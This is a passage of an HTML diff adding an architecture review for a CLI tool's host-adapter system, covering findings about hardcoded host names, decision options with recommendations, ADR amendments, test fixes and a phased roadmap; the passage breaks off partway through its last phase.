+  <nav class="toc" aria-label="Contents">
+    <a href="#brief">0 · Executive brief (plain language)</a>
+    <a href="#state">1 · The state model: a bimodal host axis</a>
+    <a href="#tiers">2 · The de-facto host tiers</a>
+    <a href="#findings">3 · Findings inventory (F-01…F-30)</a>
+    <a href="#decisions">4 · Decision areas (D-1…D-7)</a>
+    <a href="#amendments">5 · ADR amendments register</a>
+    <a href="#tests">6 · Test &amp; docs remediation</a>
+    <a href="#roadmap">7 · Sequenced roadmap</a>
+    <a href="#hermes">8 · Appendix: Hermes verification</a>
+  </nav>
+
+  <h2 id="state">1 · The state model: a bimodal host axis</h2>
+  <p>
+    The single most important structural fact: <b>everything that validates a host is generic;
+    nearly everything that acts on a host is hardcoded by name.</b>
+  </p>
+  <p>
+    The registry, capability vocabulary, and all six validators are host-agnostic and already
+    proven against synthetic hosts (<code>capability-derived.test.mjs</code> exercises a
+    <code>future-host</code>; <code>trust-manifest.test.mjs:47-69</code> injects a
+    <code>grok</code> host end-to-end through setup disclosure). But dispatch, presentation,
+    attribution, guidance, teardown, and version tracking each carry literal
+    <code>claude</code>/<code>codex</code>/<code>opencode</code> branches. A conforming
+    fourth host registered today would validate cleanly, appear in exactly two surfaces
+    (the setup/sync install loop and the trust manifest), and be invisible — or actively
+    breaking — everywhere else.
+  </p>
+  <p>
+    This is why "inconsistent UX" is the right frame: the inconsistency is not a Hermes
+    problem. Several gaps below already bite OpenCode, the third <em>built-in</em> host.
+    The extensibility question (D-1) only raises the stakes; it does not create the debt.
+  </p>
+
+  <h2 id="tiers">2 · The de-facto host tiers</h2>
+  <p>
+    Three tiers already exist in behavior but not in vocabulary. The command surface calls all
+    of them "host," and <code>ak host pick</code> means something different at each tier.
+  </p>
+  <div class="tablewrap"><table>
+    <tr><th>Tier</th><th>Hosts</th><th>Can do</th><th>Cannot do</th></tr>
+    <tr>
+      <td class="nowrap"><b>Session host</b></td>
+      <td class="nowrap">claude, codex</td>
+      <td>Drive the ruflo loop (<code>ENABLE_*</code>), be primary, statusline, quota channels, usage scorecard, MCP bridge</td>
+      <td>—</td>
+    </tr>
+    <tr>
+      <td class="nowrap"><b>Supervised execution host</b></td>
+      <td class="nowrap">opencode</td>
+      <td>Route <code>ak run</code> activities; permission events intercepted (<code>permission_required</code>)</td>
+      <td>Primary, AQE provider, statusline, vendor-diversity credit, usage/quota/live-session attribution</td>
+    </tr>
+    <tr>
+      <td class="nowrap"><b>External execution host</b> <span class="chip ext">proposed</span></td>
+      <td class="nowrap">hermes (ADR-0030)</td>
+      <td>Route activities via an externally maintained adapter; host-declared usage sidecar</td>
+      <td>Everything tier 2 cannot, <em>plus</em> no interceptable permission event — <code>hermes&nbsp;-z</code> auto-approves by its own headless contract (disclosed, verified)</td>
+    </tr>
+  </table></div>
+  <p>
+    ADR-0020 already mandates tier 2's shape for OpenCode ("explicit, supervised, non-primary,
+    outside AQE provider routing, absent from vendor-diversity facts"). ADR-0029's capability
+    caps reproduce that shape for external hosts — tested policy, not new policy. What is
+    missing is the <em>vocabulary</em>: no surface tells the user which tier a host is in or why
+    a capability is absent (see D-2).
+  </p>
+
+  <h2 id="findings">3 · Findings inventory</h2>
+  <p>
+    Severity: <span class="chip blocker">blocker</span> crashes or corrupts;
+    <span class="chip major">major</span> wrong or missing behavior a user will hit;
+    <span class="chip minor">minor</span> debt, dead code, or docs drift;
+    <span class="chip ok">healthy</span> baseline worth protecting.
+    Scope: <span class="chip today">today</span> affects built-in hosts now;
+    <span class="chip ext">ext</span> manifests only if extensibility (D-1) proceeds.
+  </p>
+
+  <h3>3.1 Registry &amp; validation — the healthy baseline</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-00</td><td>Registry descriptors, closed capability vocabulary (<code>registries.mjs:6-9,154-225</code>), six host-agnostic validators, <code>validateRegistries</code> at construction, pure capability selectors, graceful runner degradation (<code>runner.mjs:246-252</code>), fully generic trust manifest (<code>trust-manifest.mjs</code>) and footprint install loop (<code>footprint/install.mjs:170-178</code>). Protect this.</td><td><span class="chip ok">healthy</span></td><td><span class="chip today">today</span></td></tr>
+  </table></div>
+
+  <h3>3.2 Dispatch &amp; lifecycle</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-01</td><td><code>EXECUTION_ADAPTERS</code> is a frozen 3-entry Map with a <b>bidirectional invariant that throws at module import</b> (<code>execution/adapters.mjs:8-12,20-30</code>). Any registered routable host outside the Map bricks <code>ak run</code> for everyone. ADR-0018 prose states the invariant in one direction only; the code enforces both. The single hardest extensibility gate — absent from ADR-0029 §8.</td><td><span class="chip blocker">blocker</span></td><td><span class="chip ext">ext</span></td></tr>
+    <tr><td class="id">F-02</td><td>Lifecycle adapter selection is a named import at five call sites (<code>sync.mjs:11,195-197</code>; <code>x/host.mjs:19,326,617-619,642</code>; <code>setup.mjs:15,216</code>). No lifecycle registry, no <code>host.lifecycle</code> field; <code>validateHostAdapter</code> doesn't accept one. A conforming third-party lifecycle has no dispatch path.</td><td><span class="chip major">major</span></td><td><span class="chip ext">ext</span></td></tr>
+    <tr><td class="id">F-03</td><td><code>ak uninstall</code> bypasses <code>runLifecycle</code> entirely — calls <code>retireOpencode(cfg)</code> directly (<code>uninstall.mjs:112-142</code>). Third-party footprint would persist on disk permanently; even for built-ins, teardown has two code paths.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-04</td><td>Setup permission handling authorizes only claude-host rules; <code>removeUndisclosedPermissions</code> (<code>setup.mjs:95,102,120-128</code>) would strip a third-party host's permissions and fail setup.</td><td><span class="chip major">major</span></td><td><span class="chip ext">ext</span></td></tr>
+  </table></div>
+
+  <h3>3.3 Presentation</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-05</td><td><code>status.mjs</code> is split-brained: a generic host loop yields install+auth rows (<code>:500-529</code>), then hand-rolled blocks per host — codex MCP/bridge (<code>:352-382</code>), codex plugins (<code>:387-400</code>), an 88-line opencode block importing 8 symbols (<code>:407-495</code>), codex statusline row (<code>:729-746</code>), a claude-only blocks loop (<code>:670</code>). <code>normalizedFacts</code> is collected but consumed for exactly one field (<code>:505-506</code>) — everything else re-probes. Rendering from <code>normalizedFacts</code> is also the direction of the #129/#133/#136 status-vs-sync projection fixes.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-06</td><td>About directory cards are a frozen literal (<code>dashboard/about-directory.mjs:54-110</code>) with a <b>test-enforced</b> registry↔directory parity invariant (<code>about-directory.test.mjs:118-140,157-161,381-385</code>; <code>ddd/component-directory.md:164-165</code>). Any registered host without an authored card fails CI; card matching also assumes <code>npmPackage</code> is non-null.</td><td><span class="chip major">major</span></td><td><span class="chip ext">ext</span></td></tr>
+    <tr><td class="id">F-07</td><td>Statusline is two host-specific patchers (claude helper, codex TOML) with <code>cfg.statusline.codex</code> as a literal config key; consistent with the <code>commandStatusline</code> cap — but <code>statuslineSupported</code> (<code>hosts.mjs:37,53-55</code>) has zero call sites: a dead capability consumer.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+  </table></div>
+
+  <h3>3.4 Attribution &amp; observability</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-08</td><td>Usage scorecard needs seven per-host edits; worse, unknown hosts are <b>misattributed, not omitted</b>: non-codex sessions collapse to <code>claude</code> (<code>usage-index.mjs:1407-1408</code>), <code>parseFile</code>'s 2-branch ternary falls through to <code>parseClaude</code> (<code>:831-848</code>), and a fourth root would collide in the single-flight cache (<code>scanKey</code>, <code>:1169</code>). Aggregation itself is generically string-keyed (<code>:1083</code>) — records just never reach it correctly.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-09</td><td>Live sessions rewrite unknown hosts to <code>'internal'</code> (<code>live/event-schema.mjs:3,107</code>) — namespace collision — and <code>process-sessions.mjs:49-53</code> filters unknown binaries out entirely. No opencode transcript reader exists.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-10</td><td>Quota is a fixed <code>{claude, codex}</code> record (<code>quota.mjs:30-31,252-257</code>). Consistent with ADR-0010's sanctioned channels — but hosts without a quota channel are silent rather than labeled ("no quota surface for this host").</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-11</td><td><code>qeCourt.vendorOf</code> is a literal prefix table (<code>qeCourt.mjs:24-32</code>); any unregistered host id maps to <code>'unknown'</code>, so N distinct third-party vendors collapse into one bucket — vendor-diversity findings can be spuriously tripped or spuriously satisfied.</td><td><span class="chip major">major</span></td><td><span class="chip ext">ext</span></td></tr>
+    <tr><td class="id">F-12</td><td><code>host.observability</code> is declared-but-dead: <code>OBSERVABILITY_REGISTRY</code> is exported (<code>registries.mjs:250</code>) and imported nowhere; no dispatcher maps an observability id to a collector. It looks like the telemetry extension point and is validation metadata only.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-13</td><td>The provider-binding migrator's defaults map is <code>{claude:'anthropic', codex:'openai'}</code> (<code>adapters/config.mjs:64-79</code>); every other host is stamped <code>unknown-via-&lt;host&gt;</code>, provider <code>null</code>, provenance <code>'unknown'</code> on <b>every load</b>. Already affects opencode.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+  </table></div>
+
+  <h3>3.5 Config &amp; schema</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-14</td><td><code>kit.json</code> accepts unknown top-level keys silently (blind spread, <code>config.mjs:99-124</code>; envelope check only asserts <code>integrations.hosts</code> is an object, <code>:52-82</code>). A future <code>hostAdapters</code> key on an older ak round-trips untouched and does nothing — a silent no-op with no warning story.</td><td><span class="chip major">major</span></td><td><span class="chip ext">ext</span></td></tr>
+    <tr><td class="id">F-15</td><td>The DEFAULTS host map <code>{claude:true, codex:false, opencode:false}</code> is triplicated (<code>config.mjs:28</code>, <code>providers.mjs:547</code>, <code>x/host.mjs:334</code>).</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-16</td><td><code>validateBinding</code> with an <code>unknown-host</code> error code exists (<code>bindings.mjs:72-84</code>) and is called from nowhere in <code>src/</code>. The registry-aware validation the extension point needs is already written and dead.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+  </table></div>
+
+  <h3>3.6 Guidance, paths, versions</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-17</td><td>Guidance targets are a closed list of four literal names (<code>blocks.mjs:280-292</code>); <code>customBlocks</code> rows are generic over target names but <code>retiredForTarget</code> force-strips rows naming a fifth (<code>:315</code>). Meanwhile <code>host.legacy.guidanceFile</code> is declared, read once (<code>hosts.mjs:34</code>), and consumed by nothing. ADR-0030 §6 sidesteps this by reusing the <code>agents</code> target — the trap remains for any host whose file differs.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-18</td><td><code>versions.mjs:70</code> hand-mirrors the host npm package list "to avoid an import cycle" — but <code>footprint/install.mjs</code> already imports <code>HOST_REGISTRY</code>, so the cycle is one-directional and solvable. A no-npm host is invisible to the drift nudge.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-19</td><td><code>lib/paths.mjs</code> is named per-host constants with no <code>hostDir(id)</code> resolver; the registry carries no path metadata at all, so even a fully-looped consumer has nothing to loop over.</td><td><span class="chip minor">minor</span></td><td><span class="chip ext">ext</span></td></tr>
+    <tr><td class="id">F-20</td><td><code>npmRoot(host.install.npmPackage)</code> is called unguarded in <code>footprint/install.mjs</code>; the first host without an npm package breaks the census. (ADR-0029 §8 names this; trivially fixable independently.)</td><td><span class="chip minor">minor</span></td><td><span class="chip ext">ext</span></td></tr>
+  </table></div>
+
+  <h3>3.7 Routing &amp; run</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-23</td><td>Routing hardcodes <code>HOST_PROVIDER = {claude, codex}</code> (<code>routing.mjs:25</code>), <code>DEFAULT_ROUTES</code> (<code>:203-216</code>), <code>MODEL_CATALOG</code> (<code>:56-72</code>), and a strictly binary escalation swap — <code>host === 'claude' ? 'codex' : 'claude'</code> (<code>:180,193,354</code>). Plan eligibility itself is generic (<code>:584-598</code>). A third routable host is routable in name only: no ladder can name it and no seed includes it.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-24</td><td><code>--primary-host</code> validates generically against <code>PRIMARY_HOSTS</code>, but help text is literal (<code>x/host.mjs:87-90</code>) and the fallback unshifts <code>'claude'</code> (<code>:494</code>).</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-25</td><td>The Claude↔Codex MCP bridge is literal wiring (<code>providers.mjs:622-681</code>) — correct for a codex-specific feature, but there is no per-host "bridge capability" concept, so the asymmetry (codex delegable via MCP, opencode/hermes not) is nowhere stated to the user.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-26</td><td>Managed env emits only <code>ENABLE_CLAUDE_CODE</code>/<code>ENABLE_CODEX</code> (<code>providers.mjs:686-698</code>); hosts with no ruflo backend flag are simply absent, with no capability-derived explanation.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+  </table></div>
+
+  <h3>3.8 Provider axis</h3>
+  <div class="tablewrap"><table>
+    <tr><th>ID</th><th>Finding</th><th>Severity</th><th>Scope</th></tr>
+    <tr><td class="id">F-28</td><td><code>providerEntries</code> derives capabilities from identity comparisons inside a <code>.map</code> (<code>modelDiscovery: id === 'ollama'</code>). Does not survive a second local provider. ADR-0028 §4's per-entry-data refactor is correct and needed regardless of the rest of PR #131.</td><td><span class="chip major">major</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-29</td><td>AQE projection asymmetry: <code>ollama</code> is an AQE provider type; <code>local-openai</code> (ADR-0028) is deliberately not projected. Right call — but it must be stated in the ADR and surfaced in status, or it reads as a bug later.</td><td><span class="chip minor">minor</span></td><td><span class="chip today">today</span></td></tr>
+    <tr><td class="id">F-30</td><td>Hermes factual corrections required in ADR-0028/0030 (verified against source, see <a href="#hermes">appendix</a>): unofficial npm bridge exists; <code>lmstudio</code> is first-class, no <code>mlx</code> alias; <code>api_mode: openai</code> is invalid and silently dropped; <code>--max-turns</code> exists on <code>chat -q</code>; config dispatcher pointer wrong.</td><td><span class="chip minor">minor</span></td><td><span class="chip ext">ext</span></td></tr>
+  </table></div>
+
+  <h2 id="decisions">4 · Decision areas</h2>
+
+  <div class="decision" id="d1">
+    <h3>D-1 · Extensibility posture <span class="chip today">the one genuinely user-owned call</span></h3>
+    <p class="dq">Do we publish host adapters as an extension point (ADR-0029), stay closed, or absorb Hermes in-tree?</p>
+    <p class="opt"><b class="tag">A</b><b>Accept ADR-0029, amended.</b> Publish the seam with the honest gate list (F-01…F-06, F-11, F-14, F-21), formally superseding ADR-0016's closed-registry clause. Cost: the in-tree refactors plus a loader and fixture adapter; contract consumers constrain refactors (bounded by the alpha-instability statement). Benefit: fourth-host requests answered once; conformance evidence about our own abstractions.</p>
+    <p class="opt"><b class="tag">B</b><b>Decline and reaffirm.</b> Keep ADR-0016's closed registry, record the reaffirmation explicitly, and point Hermes at a fork. Cost: the fork drifts, no conformance evidence, the fifth-host request re-litigates this. Benefit: zero contract obligation while alpha churns.</p>
+    <p class="opt"><b class="tag">C</b><b>Absorb Hermes in-tree (ADR-0017 style).</b> ~14 files and ~8 test suites per host, permanent maintainer obligation for a CLI driven by another vendor's daily release cadence (40+ commits/day observed). The contributor themselves argues against this.</p>
+    <p class="rec"><b>Recommendation</b> — Option A, sequenced so the in-tree refactors land first and stand on their own (they delete host-specific code and fix bugs that bite OpenCode today). Critically: <b>Phase 0 hygiene below is owed under every option</b>, including B — misattribution and dead seams are not extensibility problems.</p>
+  </div>
+
+  <div class="decision" id="d2">
+    <h3>D-2 · Host tier vocabulary &amp; UX</h3>
+    <p class="dq">Three behavioral tiers exist (§2) with no product vocabulary. How do we make capability differences legible?</p>
+    <p class="opt"><b class="tag">A</b><b>Capability-derived labels everywhere.</b> Status, about, and help render a tier label and per-capability explanations derived from the registry ("no quota surface for this host", "auto-approving — no permission event to intercept"). No new config; the registry already knows.</p>
+    <p class="opt"><b class="tag">B</b><b>Docs-only tiers.</b> Name the tiers in HOST-SUPPORT.md and leave commands as-is. Cheaper, but the inconsistency the user experiences is in the commands, not the docs.</p>
+    <p class="opt"><b class="tag">C</b><b>Flatten.</b> Pretend all hosts are equal. Rejected: it would misrepresent the Hermes approval posture, which ADR-0030 rightly insists on disclosing.</p>
+    <p class="rec"><b>Recommendation</b> — Option A. Every absence becomes a stated fact instead of silence: this is the single highest-leverage UX consistency move, it consumes the same capability flags the caps enforce, and it revives the dead consumers (F-07, F-12, F-26).</p>
+  </div>
+
+  <div class="decision" id="d3">
+    <h3>D-3 · Dispatch generalization depth</h3>
+    <p class="dq">How far do the in-tree refactors go?</p>
+    <p class="opt"><b class="tag">A</b><b>Minimal:</b> registry-driven lifecycle lookup only (F-02). Unblocks a loader but leaves status, uninstall, and guidance split-brained.</p>
+    <p class="opt"><b class="tag">B</b><b>Full generalization:</b> lifecycle lookup (F-02) + uninstall through <code>runLifecycle undo</code> (F-03) + status rendered from <code>normalizedFacts</code> (F-05) + guidance targets derived from the registry (F-17) + the <code>adapters.mjs</code> invariant softened to built-ins with a merge seam (F-01) + setup permission authorization keyed by host (F-04).</p>
+    <p class="rec"><b>Recommendation</b> — Option B. Each piece deletes host-specific code, and the status refactor continues the #129/#133/#136 single-projection direction — it must preserve the configured-projection + repoRoot scope gate landed there. F-01's softer rule has in-corpus precedent (ADR-0019:75-76: a rung naming a host with no adapter records <code>cli_unavailable</code> and continues).</p>
+  </div>
+
+  <div class="decision" id="d4">
+    <h3>D-4 · Attribution policy for non-first-party hosts</h3>
+    <p class="dq">Usage, live sessions, quota, and vendor facts currently misattribute or erase unknown hosts. What is the policy?</p>
+    <p class="opt"><b class="tag">A</b><b>Exclude-and-label now.</b> Unknown/uninstrumented hosts get an explicit bucket keyed by host id — never collapsed to <code>claude</code> (F-08), never rewritten to <code>internal</code> (F-09), never silently absent from quota (F-10). <code>qeCourt.vendorOf</code> returns a per-id <code>unregistered:&lt;host&gt;</code> verdict that <b>never counts toward vendor diversity</b> (F-11) — consistent with ADR-0020's "absent unless independently observed."</p>
+    <p class="opt"><b class="tag">B</b><b>Ingestion contract later.</b> A v2 adapter contract lets a host declare a usage sidecar (Hermes <code>--usage-file</code> is the model: host-declared, ADR-0021 <code>configured</code>-grade, written even on failure). Real value, but it needs the extension point to exist first and a provenance-grading decision.</p>
+    <p class="opt"><b class="tag">C</b><b>Status quo.</b> Rejected: it is not neutral — it actively corrupts the claude bucket and the <code>internal</code> namespace today.</p>
+    <p class="rec"><b>Recommendation</b> — A immediately (it is a correctness fix for the scorecard you already hardened in PR #60), B as a v2 contract item once D-1/Phase 2 lands.</p>
+  </div>
+
+  <div class="decision" id="d5">
+    <h3>D-5 · Config &amp; schema hygiene</h3>
+    <p class="dq">kit.json silently swallows the unknown; host defaults live in three places.</p>
+    <p class="opt"><b class="tag">A</b><b>Warn-on-unknown top-level keys</b> (F-14) so a <code>hostAdapters</code> block on an older ak is a visible message, not a silent no-op; derive the DEFAULTS host map from the registry once (F-15); wire <code>validateBinding</code> into the load path or delete it (F-16); make the migrator's defaults registry-driven and stop re-stamping <code>unknown-via-&lt;host&gt;</code> on every load (F-13).</p>
+    <p class="opt"><b class="tag">B</b><b>Strict-reject unknown keys.</b> Rejected: breaks forward-compatibility between ak versions sharing a kit.json — warn is the right strength.</p>
+    <p class="rec"><b>Recommendation</b> — Option A, all four items in one hygiene pass; each is small and none depends on D-1.</p>
+  </div>
+
+  <div class="decision" id="d6">
+    <h3>D-6 · Guidance, paths, versions derivation</h3>
+    <p class="dq">Three registry fields are declared and consumed by nothing; three consumers hand-mirror what the registry knows.</p>
+    <p class="opt"><b class="tag">A</b><b>Make the registry the source:</b> guidance targets derived from a real (non-legacy) registry field (F-17); <code>HOST_PKGS</code> derived from <code>install.npmPackage</code> (F-18); add path metadata / a <code>hostDir(id)</code> resolver or explicitly document paths as first-party-only (F-19); either implement observability dispatch or re-document the field as validation metadata (F-12).</p>
+    <p class="opt"><b class="tag">B</b><b>Delete the dead fields.</b> Honest, but forfeits the derivation wins and re-opens each on the next host.</p>
+    <p class="rec"><b>Recommendation</b> — Option A for guidance/versions (both fix real drift hazards ADR-0017 §retrospective already named); for observability and paths, decide per field — a one-line ADR note ("validation metadata only") is an acceptable terminal state if no consumer is planned.</p>
+  </div>
+
+  <div class="decision" id="d7">
+    <h3>D-7 · Provider axis</h3>
+    <p class="dq">ADR-0028 and the provider registry's shape.</p>
+    <p class="opt"><b class="tag">A</b><b>Accept ADR-0028</b> with the <code>api_mode</code> citation fix (F-30) and an explicit note on the AQE projection asymmetry (F-29); land the per-entry capability refactor (F-28) with it.</p>
+    <p class="opt"><b class="tag">B</b><b>Vendor enumeration instead</b> (<code>mlx</code>, <code>lmstudio</code>, …). Rejected in the ADR itself, and our verification strengthens the rejection: MLX has no Hermes alias either — users name their own providers.</p>
+    <p class="rec"><b>Recommendation</b> — Option A. This is the easiest accept in PR #131: small, independent, fixes F-28, and useful to the hosts already shipped.</p>
+  </div>
+
+  <h2 id="amendments">5 · ADR amendments register</h2>
+  <p>The prior decisions this work touches, and what happens to each. Nothing is amended silently.</p>
+  <div class="tablewrap"><table>
+    <tr><th>ADR</th><th>Clause at stake</th><th>Action</th><th>Trigger</th></tr>
+    <tr><td class="nowrap">0016</td><td>"A closed, validated registry of built-in code, not an arbitrary third-party plugin runtime" (:59-61; non-goal :441-442)</td><td><b>Supersede that clause</b> if D-1 = A; <b>reaffirm explicitly</b> if D-1 = B. Either way, decide on the record — ADR-0029 currently routes around it.</td><td class="nowrap">D-1</td></tr>
+    <tr><td class="nowrap">0018</td><td>Routability→adapter invariant stated one-directionally in prose; enforced bidirectionally at import (F-01)</td><td><b>Amend</b> to the decided rule: bidirectional for built-ins, merge seam for registered adapters.</td><td class="nowrap">D-3</td></tr>
+    <tr><td class="nowrap">0019</td><td><code>cli_unavailable</code> graceful degradation (:75-76)</td><td><b>Reaffirm</b>; cite as the degradation norm F-01's softening follows.</td><td class="nowrap">D-3</td></tr>
+    <tr><td class="nowrap">0010</td><td>Sanctioned quota channels (statusline tee, codex app-server)</td><td><b>Amend</b>: quota channels are a per-host capability; hosts without one are labeled, not silent (F-10).</td><td class="nowrap">D-2/D-4</td></tr>
+    <tr><td class="nowrap">0021</td><td>Provenance grades for inference evidence</td><td><b>Extend</b> for host-declared usage sidecars (<code>configured</code> grade; Hermes <code>--usage-file</code> is the reference case).</td><td class="nowrap">D-4 (B)</td></tr>
+    <tr><td class="nowrap">0020</td><td>OpenCode's supervised, non-primary shape</td><td><b>Amend</b> to name the host-tier taxonomy (§2) as product vocabulary.</td><td class="nowrap">D-2</td></tr>
+    <tr><td class="nowrap">0028</td><td>New — local OpenAI-compatible provider</td><td><b>Accept</b> after the <code>api_mode: chat_completions</code> citation fix + F-29 note.</td><td class="nowrap">D-7</td></tr>
+    <tr><td class="nowrap">0029</td><td>New — extension point</td><td><b>Amend then accept</b> (if D-1 = A): full gate list (F-01…F-06, F-11, F-14, F-21), ADR-0016 supersession, older-ak silent no-op mitigation.</td><td class="nowrap">D-1</td></tr>
+    <tr><td class="nowrap">0030</td><td>New — Hermes reference adapter</td><td><b>Correct then accept</b>, contingent on 0029: F-30's four factual fixes. Its safety posture (YOLO disclosure, reverse-bridge exclusion) is verified and right.</td><td class="nowrap">D-1</td></tr>
+    <tr><td class="nowrap">0031 (new)</td><td>—</td><td><b>Author</b>: "Host tiers and attribution surfaces" — records D-2 + D-4(A) as one decision, whichever way D-1 goes.</td><td class="nowrap">D-2/D-4</td></tr>
+  </table></div>
+
+  <h2 id="tests">6 · Test &amp; docs remediation</h2>
+  <h3>Tests that pin the host set (F-21, F-22)</h3>
+  <ul>
+    <li><b>Hard pins (7):</b> <code>hosts.test.mjs:10-11</code> (<code>deepEqual(HOST_IDS, [...])</code>); <code>providers.test.mjs:222-225</code> (test name says "come only from registry capabilities", body hardcodes the set — fix the body to match the name); <code>about-directory.test.mjs:118-140, 157-161, 381-385</code> (parity + order); <code>execution-runner.test.mjs:459-469</code> (pins the import-time invariant); <code>routing-primary.test.mjs:45-48</code> (stays green under the capability cap).</li>
+    <li><b>DEFAULTS literal pins (5):</b> <code>setup-host-flags.test.mjs:93-101</code>, <code>provider-cli.test.mjs:242,279</code>, <code>routing-config.test.mjs:162-163</code>, <code>integration-config.test.mjs:176-177</code>.</li>
+    <li><b>Fix pattern:</b> derive expected sets from the registry (scoped to built-ins where the assertion is about built-ins), never from a fresh literal.</li>
+    <li><b>Sentinel hazard:</b> five negative tests use <code>gemini</code> as the "unknown host" — they silently invert if that id ever registers (<code>hosts.test.mjs:40-41,106-108</code>; <code>setup-host-flags.test.mjs:48-53</code>; <code>routing.test.mjs:155-158,163-169,212-217</code>). Replace with an unmistakably synthetic id.</li>
+  </ul>
+  <h3>Docs stating a closed set as normative (F-27)</h3>
+  <ul>
+    <li><code>docs/HOST-SUPPORT.md</code> — "the three execution hosts" + five fixed-arity matrices; consider generating the matrices from the registry.</li>
+    <li><code>docs/ddd/ubiquitous-language.md:143</code> — defines "host" by enumeration.</li>
+    <li><code>docs/PROVIDERS.md</code> §3.5 — routing table prose.</li>
+    <li><code>docs/ddd/component-directory.md:164-165</code> — the parity invariant that is also test-enforced (F-06).</li>
+  </ul>
+
+  <h2 id="roadmap">7 · Sequenced roadmap</h2>
+
+  <div class="phase">
+    <h3>Phase 0 — Consistency hygiene owed regardless of D-1</h3>
+    <p class="ph-meta">No decisions required · every item bites built-in hosts today · each independently shippable</p>
+    <ul>
+      <li>F-08: unknown-host usage records → explicit per-id bucket, kill the collapse-to-claude and the scanKey collision.</li>
+      <li>F-09: live-session unknown hosts → explicit bucket, not <code>'internal'</code>.</li>
+      <li>F-11: <code>vendorOf</code> → registry-driven with <code>unregistered:&lt;id&gt;</code>, never counted toward diversity.</li>
+      <li>F-13: migrator defaults registry-driven; stop restamping on every load.</li>
+      <li>F-15/F-16: single registry-derived DEFAULTS; wire or delete <code>validateBinding</code>.</li>
+      <li>F-07/F-12: remove or revive the dead capability consumers (<code>statuslineSupported</code>, observability field) — one-line ADR note if terminal.</li>
+      <li>F-20 + the plain-text subprocess capture: tiny, independently useful, and they de-risk Phase 3.</li>
+      <li>F-22: replace the <code>gemini</code> sentinels.</li>
+    </ul>
+  </div>
+
+  <div class="phase">
+    <h3>Phase 1 — Provider axis (D-7)</h3>
+    <p class="ph-meta">Accept ADR-0028 · independent of everything else</p>
+    <ul>
+      <li>F-28: <code>providerEntries</code> → per-entry capability records (matches <code>hostEntries</code>).</li>
+      <li><code>local-openai</code> row + user-declared bindings; F-29 asymmetry stated in ADR and surfaced in status; F-30 <code>api_mode</code> citation fix.</li>
+    </ul>
+  </div>
+
+  <div class="phase">
+    <h3>Phase 2 — The extensibility decision (D-1, D-3) and in-tree generalization</h3>
+    <p class="ph-meta">Gate: ADR-0016 supersession + amended ADR-0029 accepted · refactors delete host-specific code and stand alone even if the loader never ships</p>
+    <ul>
+      <li>F-01: <code>adapters.mjs</code> invariant → built-ins-bidirectional + merge seam (ADR-0019 precedent).</li>
+      <li>F-02: lifecycle registry field + five call sites → registry lookup; OpenCode passes unchanged.</li>
+      <li>F-03: uninstall through <code>runLifecycle undo</code>.</li>
+      <li>F-04: setup permission authorization keyed by host.</li>
+      <li>F-05: status rendered from <code>normalizedFacts</code> — preserving the #129/#133/#136 projection + scope-gate behavior.</li>
+      <li>F-17: guidance targets derived from the registry.</li>
+      <li>F-06: default host card generation or built-in-scoped parity.</li>
+      <li>F-14: warn-on-unknown kit.json keys (the <code>hostAdapters</code> silent no-op mitigation).</li>
+      <li>F-21: test derivations from the registry.</li>
+      <li>The loader: explicit <code>hostAdapters</code> registration, <code>contract: 1</code>, capability caps, per-adapter fail-closed admission, <code>third-party-adapter</code> trust-manifest kind, fixture adapter in <code>tests/</code>.</li>
+    </ul>
+  </div>
+
+  <div class="phase">
+    <h3>Phase 3 — Hermes as first external consumer (ADR-0030) + tier vocabulary (D-2)</h3>
+    <p class="ph-meta">Adapter externally maintained by its proposer · ak carries no hermes-specific code</p>
+    <ul>
+      <li>ADR-0030 corrections (F-30) then acceptance; conformance evidence flows back.</li>
+      <li>D-2 capability-derived tier labels in status/about/help; F-10 quota labeling; F-25/F-26 stated asymmetries.</li>
+      <li>Docs corpus update (§6), HOST-SUPPORT matrices generated from the registry.</li>
+    </ul>
+  </div>
+
+  <div class="phase">
+    <h3>Phase 4 — Deferred, deliberately</h3>
+    <p class="ph-meta">Each needs evidence that doesn't exist yet</p>
+    <ul>
+      <li>D-4 (B): v2 ingestion contract for host-declared usage sidecars (ADR-0021 extension).</li>
